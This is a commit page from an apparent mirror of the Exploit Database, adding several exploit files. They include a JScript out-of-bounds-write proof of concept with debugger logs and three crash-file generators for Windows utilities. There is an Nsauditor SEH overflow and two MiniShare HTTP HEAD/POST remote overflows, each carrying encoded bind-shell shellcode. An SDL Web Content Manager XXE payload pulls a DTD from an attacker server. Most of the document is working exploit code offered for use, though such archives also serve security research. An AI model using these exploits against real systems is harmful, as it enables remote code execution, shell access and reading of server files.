bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-12-19

Browse source 
10 changes to exploits/shellcodes

VMware Fusion 2.0.5 - vmx86 kext Local Buffer Overflow (PoC)
Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write
AnyBurn 4.3 - Local Buffer Overflow Denial of Service
Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service
MegaPing - Local Buffer Overflow Denial of Service

Exim 4.41 - 'dns_build_reverse' Local
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow

Microsoft Jet Database - 'msjet40.dll' Reverse Shell (2)
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)

Microsoft Windows Server 2003 - Token Kidnapping Local
Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation

VMware Fusion 2.0.5 - vmx86 kext Local

Nsauditor 3.0.28.0 - Local SEH Buffer Overflow

Google Android 2.0 < 2.1 - Reverse Shell
Google Android 2.0 < 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP)

MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method

SDL Web Content Manager 8.5.0 - XML External Entity Injection
This commit is contained in:
Offensive Security 2018-12-19 05:01:45 +00:00
parent a9bfc525dd
commit c6ebf8bc23
9 changed files with 606 additions and 5 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

0
exploits/osx/local/10078.c → exploits/osx/dos/10078.c
View file

149
exploits/windows/dos/46001.html Normal file
View file

@ -0,0 +1,149 @@
<!--
There is an out-of-bounds write vulnerability in jscript.dll in JsArrayFunctionHeapSort function. This vulnerability can be exploited through Internet Explorer or potentially through WPAD over local network.
PoC:
=========================================================
-->
<!-- saved from url=(0014)about:internet -->
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
<script language="Jscript.Encode">
function f0() { }
function f1() {
f2.prototype = arguments;
new f2();
}
function f2() {
Array.prototype.sort.call(this, f0);
}
f1(1, 2, 3);
</script>
<!--
=========================================================
Details:
JsArrayFunctionHeapSort is called when sorting an array with a provided comparison function. One of its arguments is the number of elements in the input array/object. The function then allocates a temporary array of the this size, copies all properties of the input array/object into it (where property name is numeric and smaller than the "length" property of the input object) and proceeds to sort the temporary array. Normally, the allocated array is sufficient to store all the properties to be sorted. However, in the case of the attached PoC, where the sorted object prototype is the arguments object, when calculating the number of elements, the number of elements in the arguments object aren't taken into account, which leads to an overflow.
Debug Log:
=========================================================
(1d50.1d80): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=c0c00003 ebx=07512fc0 ecx=0d1e3008 edx=074faf50 esi=0c3c6f30 edi=07512fc0
eip=6d53a09e esp=096daa44 ebp=096daa6c iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
jscript!NameTbl::GetValCore+0x54915:
6d53a09e 8901 mov dword ptr [ecx],eax ds:002b:0d1e3008=????????
0:007> k
# ChildEBP RetAddr
00 096daa6c 6d4e5775 jscript!NameTbl::GetValCore+0x54915
01 096daa8c 6d4e66b1 jscript!NameTbl::GetValById+0x5f
02 096daad4 6d551f30 jscript!NameTbl::GetVal+0x112
03 096dab34 6d51d6ae jscript!NameTbl::GetVal+0x50
04 096dac14 6d51d595 jscript!JsArrayFunctionHeapSort+0xe2
05 096dac8c 6d4e7850 jscript!JsArraySort+0x1ed
06 096dacf4 6d4e7730 jscript!NatFncObj::Call+0xe8
07 096dad84 6d53ab8f jscript!NameTbl::InvokeInternal+0x2cb
08 096dadbc 6d5432dd jscript!VAR::InvokeByDispID+0x56357
09 096dae0c 6d4e7850 jscript!JsFncCall+0xbd
0a 096dae74 6d4e7730 jscript!NatFncObj::Call+0xe8
0b 096daf04 6d4e657c jscript!NameTbl::InvokeInternal+0x2cb
0c 096daff8 6d4e74c1 jscript!VAR::InvokeByName+0x1b9
0d 096db044 6d53ab21 jscript!VAR::InvokeDispName+0x3e
0e 096db074 6d4e4813 jscript!VAR::InvokeByDispID+0x562e9
0f 096db45c 6d4e3f7f jscript!CScriptRuntime::Run+0x129e
10 096db558 6d4e3e03 jscript!ScrFncObj::CallWithFrameOnStack+0x15f
11 096db5b0 6d5003bb jscript!ScrFncObj::Call+0x7b
12 096db63c 6d4eec30 jscript!ScrFncObj::Construct+0xeb
13 096db6c4 6d53ab8f jscript!NameTbl::InvokeInternal+0x338
14 096db6f8 6d4eeca4 jscript!VAR::InvokeByDispID+0x56357
15 096dbae0 6d4e3f7f jscript!CScriptRuntime::Run+0x1ff8
16 096dbbdc 6d4e3e03 jscript!ScrFncObj::CallWithFrameOnStack+0x15f
17 096dbc34 6d4e3d03 jscript!ScrFncObj::Call+0x7b
18 096dbcc4 6d53ab8f jscript!NameTbl::InvokeInternal+0x2cb
19 096dbcf8 6d4e4813 jscript!VAR::InvokeByDispID+0x56357
1a 096dc0e0 6d4e3f7f jscript!CScriptRuntime::Run+0x129e
1b 096dc1dc 6d4e3e03 jscript!ScrFncObj::CallWithFrameOnStack+0x15f
1c 096dc234 6d4e4ae7 jscript!ScrFncObj::Call+0x7b
1d 096dc2d8 6d4f32eb jscript!CSession::Execute+0x23d
1e 096dc320 6d4f4d63 jscript!COleScript::ExecutePendingScripts+0x16b
1f 096dc39c 6d4f4b49 jscript!COleScript::ParseScriptTextCore+0x206
20 096dc3c8 6e5c7d14 jscript!COleScript::ParseScriptText+0x29
21 096dc400 6e5c81eb MSHTML!CActiveScriptHolder::ParseScriptText+0x51
22 096dc470 6e27d1d1 MSHTML!CScriptCollection::ParseScriptText+0x1c6
23 096dc55c 6e27cd73 MSHTML!CScriptData::CommitCode+0x31e
24 096dc5dc 6e27d90d MSHTML!CScriptData::Execute+0x232
25 096dc5fc 6e5a4bb6 MSHTML!CHtmScriptParseCtx::Execute+0xed
26 096dc650 6e582f12 MSHTML!CHtmParseBase::Execute+0x201
27 096dc66c 6df9bd5f MSHTML!CHtmPost::Broadcast+0x18e
28 096dc7a4 6e063799 MSHTML!CHtmPost::Exec+0x617
29 096dc7c4 6e0636ff MSHTML!CHtmPost::Run+0x3d
2a 096dc7e0 6e06aef7 MSHTML!PostManExecute+0x61
2b 096dc7f4 6e06bce8 MSHTML!PostManResume+0x7b
2c 096dc824 6e0524b8 MSHTML!CHtmPost::OnDwnChanCallback+0x38
2d 096dc83c 6df4d4f3 MSHTML!CDwnChan::OnMethodCall+0x2f
2e 096dc88c 6df4d072 MSHTML!GlobalWndOnMethodCall+0x1a1
2f 096dc8e0 758962fa MSHTML!GlobalWndProc+0x103
30 096dc90c 75896d3a user32!InternalCallWinProc+0x23
31 096dc984 758977c4 user32!UserCallWinProcCheckWow+0x109
32 096dc9e4 7589788a user32!DispatchMessageWorker+0x3b5
33 096dc9f4 6f34ab7c user32!DispatchMessageW+0xf
34 096dfbc0 6f3b75f8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\iertutil.dll -
35 096dfc80 75b46b7c IEFRAME!LCIETab_ThreadProc+0x3e7
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Internet Explorer\IEShims.dll -
WARNING: Stack unwind information not available. Following frames may be wrong.
36 096dfc98 72153a31 iertutil!PrivateCoInternetCombineIUri+0x2bbc
37 096dfcd0 7554343d IEShims!IEShims_SetRedirectRegistryForThread+0x1c1
38 096dfcdc 77d99802 kernel32!BaseThreadInitThunk+0xe
39 096dfd1c 77d997d5 ntdll!__RtlUserThreadStart+0x70
3a 096dfd34 00000000 ntdll!_RtlUserThreadStart+0x1b
0:007> !heap -p -a 0d1e3008
address 0d1e3008 found in
_DPH_HEAP_ROOT @ 7d1000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
a893bc8: d1e2fe8 18 - d1e2000 2000
723f8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77e30fe6 ntdll!RtlDebugAllocateHeap+0x00000030
77deab8e ntdll!RtlpAllocateHeap+0x000000c4
77d93461 ntdll!RtlAllocateHeap+0x0000023a
75ff9d45 msvcrt!malloc+0x0000008d
6d51d645 jscript!JsArrayFunctionHeapSort+0x00000079
6d51d595 jscript!JsArraySort+0x000001ed
6d4e7850 jscript!NatFncObj::Call+0x000000e8
6d4e7730 jscript!NameTbl::InvokeInternal+0x000002cb
6d53ab8f jscript!VAR::InvokeByDispID+0x00056357
6d5432dd jscript!JsFncCall+0x000000bd
6d4e7850 jscript!NatFncObj::Call+0x000000e8
6d4e7730 jscript!NameTbl::InvokeInternal+0x000002cb
6d4e657c jscript!VAR::InvokeByName+0x000001b9
6d4e74c1 jscript!VAR::InvokeDispName+0x0000003e
6d53ab21 jscript!VAR::InvokeByDispID+0x000562e9
6d4e4813 jscript!CScriptRuntime::Run+0x0000129e
6d4e3f7f jscript!ScrFncObj::CallWithFrameOnStack+0x0000015f
6d4e3e03 jscript!ScrFncObj::Call+0x0000007b
6d5003bb jscript!ScrFncObj::Construct+0x000000eb
6d4eec30 jscript!NameTbl::InvokeInternal+0x00000338
6d53ab8f jscript!VAR::InvokeByDispID+0x00056357
6d4eeca4 jscript!CScriptRuntime::Run+0x00001ff8
6d4e3f7f jscript!ScrFncObj::CallWithFrameOnStack+0x0000015f
6d4e3e03 jscript!ScrFncObj::Call+0x0000007b
6d4e3d03 jscript!NameTbl::InvokeInternal+0x000002cb
6d53ab8f jscript!VAR::InvokeByDispID+0x00056357
6d4e4813 jscript!CScriptRuntime::Run+0x0000129e
6d4e3f7f jscript!ScrFncObj::CallWithFrameOnStack+0x0000015f
6d4e3e03 jscript!ScrFncObj::Call+0x0000007b
6d4e4ae7 jscript!CSession::Execute+0x0000023d
6d4f32eb jscript!COleScript::ExecutePendingScripts+0x0000016b
-->

28
exploits/windows/dos/46002.py Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: AnyBurn
# Date: 15-12-2018=20
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Exploit Author: Achilles
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
=20
# Steps to Produce the Crash:=20
# 1.- Run python code : AnyBurn.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open AnyBurn choose 'Copy disk to Image'
# 4.- Paste the content of EVIL.txt into the field: 'Image file name'
# 5.- Click 'Create Now' and you will see a crash.
#!/usr/bin/env python
buffer =3D "\x41" * 10000
try:
=09f=3Dopen("Evil.txt","w")
=09print "[+] Creating %s bytes evil payload.." %len(buffer)
=09f.write(buffer)
=09f.close()
=09print "[+] File created!"
except:
=09print "File cannot be created"

28
exploits/windows/dos/46003.py Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: Excel Password Recovery Professional
# Date: 15-12-2018
# Vendor Homepage:https://www.recoverlostpassword.com/
# Software Link :https://www.recoverlostpassword.com/downloads/excel_password_recovery_pro_trial.exe
# Exploit Author: Achilles
# Tested Version: 8.2.0.0
# Tested on: Windows 7 64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run python code : Excel_Password_Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Excel Password Recovery Professional
# 4.- Paste the content of EVIL.txt into the field: 'E-Mail and Registrations Code'
# 5.- Click 'Register' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 5000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

28
exploits/windows/dos/46004.py Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: MegaPing
# Date: 15-12-2018
# Vendor Homepage: http://www.magnetosoft.com/
# Software Link: http://www.magnetosoft.com/downloads/win32/megaping_setup.exe
# Exploit Author: Achilles
# Tested Version:
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run python code : MegaPing.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open MegaPing choose from the left side: 'Finger'
# 4.- Paste the content of EVIL.txt into the field: 'Destination Address List'
# 5.- Click 'Start' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 8000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

65
exploits/windows/local/46005.py Executable file
View file

@ -0,0 +1,65 @@
# Exploit Title: Nsauditor Local SEH Buffer Overflow
# Date: 15-12-2018
# Vendor Homepage:http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Exploit Author: Achilles
# Tested Version: 3.0.28.0
# Tested on: Windows XP SP3
# 1.- Run python code : Nsauditor.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Nsauditor
# 4.- In the Window select 'Tools' > 'Dns Lookup'
# 5.- Paste the content of EVIL.txt into the Field: 'Dns Query'
# 6.- Click 'Resolve'
# 7.- Connect with Netcat on port 3110
#!/usr/bin/python
buffer = "\x41" * 5235
NSEH = "\xeb\x06\x90\x90" #jmp short 6
SEH = "\x30\xFF\xE6\x01" #nsnetutils.dll
nops = "\x90" * 20
#badchar \x00\x0a\x0d\x2e
#msfvenom Bind port 3110
buf = ""
buf += "\xd9\xc7\xb8\x8e\xe7\x77\xf1\xd9\x74\x24\xf4\x5b\x29"
buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x43\x13\x03\xcd\xf4\x95"
buf += "\x04\x2d\x12\xdb\xe7\xcd\xe3\xbc\x6e\x28\xd2\xfc\x15"
buf += "\x39\x45\xcd\x5e\x6f\x6a\xa6\x33\x9b\xf9\xca\x9b\xac"
buf += "\x4a\x60\xfa\x83\x4b\xd9\x3e\x82\xcf\x20\x13\x64\xf1"
buf += "\xea\x66\x65\x36\x16\x8a\x37\xef\x5c\x39\xa7\x84\x29"
buf += "\x82\x4c\xd6\xbc\x82\xb1\xaf\xbf\xa3\x64\xbb\x99\x63"
buf += "\x87\x68\x92\x2d\x9f\x6d\x9f\xe4\x14\x45\x6b\xf7\xfc"
buf += "\x97\x94\x54\xc1\x17\x67\xa4\x06\x9f\x98\xd3\x7e\xe3"
buf += "\x25\xe4\x45\x99\xf1\x61\x5d\x39\x71\xd1\xb9\xbb\x56"
buf += "\x84\x4a\xb7\x13\xc2\x14\xd4\xa2\x07\x2f\xe0\x2f\xa6"
buf += "\xff\x60\x6b\x8d\xdb\x29\x2f\xac\x7a\x94\x9e\xd1\x9c"
buf += "\x77\x7e\x74\xd7\x9a\x6b\x05\xba\xf2\x58\x24\x44\x03"
buf += "\xf7\x3f\x37\x31\x58\x94\xdf\x79\x11\x32\x18\x7d\x08"
buf += "\x82\xb6\x80\xb3\xf3\x9f\x46\xe7\xa3\xb7\x6f\x88\x2f"
buf += "\x47\x8f\x5d\xc5\x4f\x36\x0e\xf8\xb2\x88\xfe\xbc\x1c"
buf += "\x61\x15\x33\x43\x91\x16\x99\xec\x3a\xeb\x22\x1e\x9d"
buf += "\x62\xc4\x74\xf1\x22\x5e\xe0\x33\x11\x57\x97\x4c\x73"
buf += "\xcf\x3f\x04\x95\xc8\x40\x95\xb3\x7e\xd6\x1e\xd0\xba"
buf += "\xc7\x20\xfd\xea\x90\xb7\x8b\x7a\xd3\x26\x8b\x56\x83"
buf += "\xcb\x1e\x3d\x53\x85\x02\xea\x04\xc2\xf5\xe3\xc0\xfe"
buf += "\xac\x5d\xf6\x02\x28\xa5\xb2\xd8\x89\x28\x3b\xac\xb6"
buf += "\x0e\x2b\x68\x36\x0b\x1f\x24\x61\xc5\xc9\x82\xdb\xa7"
buf += "\xa3\x5c\xb7\x61\x23\x18\xfb\xb1\x35\x25\xd6\x47\xd9"
buf += "\x94\x8f\x11\xe6\x19\x58\x96\x9f\x47\xf8\x59\x4a\xcc"
buf += "\x08\x10\xd6\x65\x81\xfd\x83\x37\xcc\xfd\x7e\x7b\xe9"
buf += "\x7d\x8a\x04\x0e\x9d\xff\x01\x4a\x19\xec\x7b\xc3\xcc"
buf += "\x12\x2f\xe4\xc4"
payload = buffer + NSEH + SEH + nops + buf
try:
f=open("EVIL.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

263
exploits/windows/remote/45999.txt Normal file
View file

@ -0,0 +1,263 @@
Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST
methods are also vulnerable. The difference is minimal, both are exploited
in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length
-------------------------------------------------------------------
EAX 00000000
ECX 77C3EF3B msvcrt.77C3EF3B
EDX 00F14E38
EBX 43346843
ESP 01563908 ASCII
"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
HTTP/1.1
"
EBP 0156BB90
ESI 00000001
EDI 01565B68
EIP 68433568
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDD000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
------------------------------------------------------------------------------
Only 210 bytes to shellcode
------------------------------------------------------------------------------
Badchars '00','0d'
------------------------------------------------------------------------------
>findjmp kernel32.dll esp - XP SP 3 English
Scanning kernel32.dll for code useable with the esp register
0x7C809F83 call esp
0x7C8369E0 call esp
0x7C83C2C5 push esp - ret
0x7C87641B call esp
<!--
# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.
# Date: 05-12-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://minishare.sourceforge.net/
# Software Link: http://minishare.sourceforge.net/
# Version: Minishare v1.4.1
# Tested on: Windows
# CVE : CVE-2018-19861
# Category: exploit
1. Description
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP HEAD request.
2. Proof of Concept
Exploit:
#!/usr/bin/env python
import socket
import struct
import os
# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP HEAD request - by Rafa
# CVE: CVE-2018-19861
# Via Egghunter because shellcode in ESP only 210 bytes long.
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 80
# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34
egghunter =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f
python -a x86 --platform windows -b "\x00\x0d" -f c
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of c file: 1516 bytes
#unsigned char buf[] =
shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"
"\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"
"\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"
"\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"
"\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"
"\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"
"\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"
"\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"
"\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"
"\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"
"\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"
"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"
"\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"
"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"
"\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"
"\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"
"\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"
"\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"
"\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"
"\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"
"\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"
"\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"
"\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c")
# findjmp kernel32.dll esp - WinXP SP3 English
#0x7C809F83 call esp
nops = "\x90" * 16
junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 -
1786 - 4 - 16 - len(egghunter))
try:
print "Sending exploit..."
connection.connect((host,port))
buffer = (
"HEAD " + junk + " HTTP/1.1\r\n"
"Host: " + shellcode + "\r\n\r\n")
connection.send(buffer)
connection.close()
print "\nExploit Sended ", len(buffer)
except:
print "Connection error"
3. Solution:
This product is deprecated
-->
<!--
# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.
# Date: 05-12-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://minishare.sourceforge.net/
# Software Link: http://minishare.sourceforge.net/
# Version: Minishare v1.4.1
# Tested on: Windows
# CVE : CVE-2018-19862
# Category: exploit
1. Description
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP POST request.
2. Proof of Concept
Exploit:
#!/usr/bin/env python
import socket
import struct
import os
# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP POST request - by Rafa
# CVE: CVE-2018-19862
# Via Egghunter because shellcode in ESP only 210 bytes long.
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 80
# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34
egghunter =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f
python -a x86 --platform windows -b "\x00\x0d" -f c
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
#x86/shikata_ga_nai chosen with final size 355
#Payload size: 355 bytes
#Final size of c file: 1516 bytes
#unsigned char buf[] =
shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
"\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"
"\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"
"\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"
"\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"
"\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"
"\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"
"\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"
"\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"
"\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"
"\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"
"\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"
"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"
"\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"
"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"
"\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"
"\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"
"\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"
"\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"
"\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"
"\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"
"\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"
"\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"
"\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c")
# findjmp kernel32.dll esp - WinXP SP3 English
#0x7C809F83 call esp
nops = "\x90" * 16
junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 -
1786 - 4 - 16 - len(egghunter))
try:
print "Sending exploit..."
connection.connect((host,port))
buffer = (
"POST " + junk + " HTTP/1.1\r\n"
"Host: " + shellcode + "\r\n\r\n")
connection.send(buffer)
connection.close()
print "\nExploit Sended ", len(buffer)
except:
print "Connection error"
3. Solution:
This product is deprecated
-->

33
exploits/xml/webapps/46000.txt Normal file
View file

@ -0,0 +1,33 @@
######################
# Author Information #
######################
Author : Ahmed Elhady Mohamed
twitter : @Ahmed__ELhady
Company : Canon Security
Date : 25/11/2018
########################
# Software Information #
########################
Affected Software : SDL Web Content Manager
Version: Build 8.5.0
Vendor: SDL Tridion
Software website : https://www.sdl.com
CVE Number: CVE-2018-19371
###############
# Description #
###############
SDL Web Content Manager build 8.5.0 is vulnerable to XXE vulnerability in SaveUserSettings web service. SaveUserSettings web service takes XML values as a parameter. The webservices allows and accepts XML external entity which allows an attacker to read sensitive files from the server. Moreover it can be used to perform network port scanning to internal network.
#################
# Exploit Steps #
#################
1- Access the application with any user account
2- it will ask you to choose your language preferences
3-the application sent a request to SaveUserSettings web service with XML content in the request body.
4- open a port listener on the attacker server using netcat tool as the following: nc -lvp 80
5- intercept the request using Burpsuite proxy tool
6- inject the following payload in the beginning of the XML value.
<!DOCTYPE cdl [<!ENTITY % asd SYSTEM \"http://attackerServer/xxe1.dtd\">%asd;%c;]>
<cdl>&rrr;</cdl>
7- The injected payload allows the server to fetch the xxe1.dtd resource from the hacker server.
8- send the request to the server.
9- The application server will connect to the attacker server

17
files_exploits.csv
View file

@ -1247,6 +1247,7 @@ id,file,description,date,author,type,platform,port
10068,exploits/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",dos,windows,
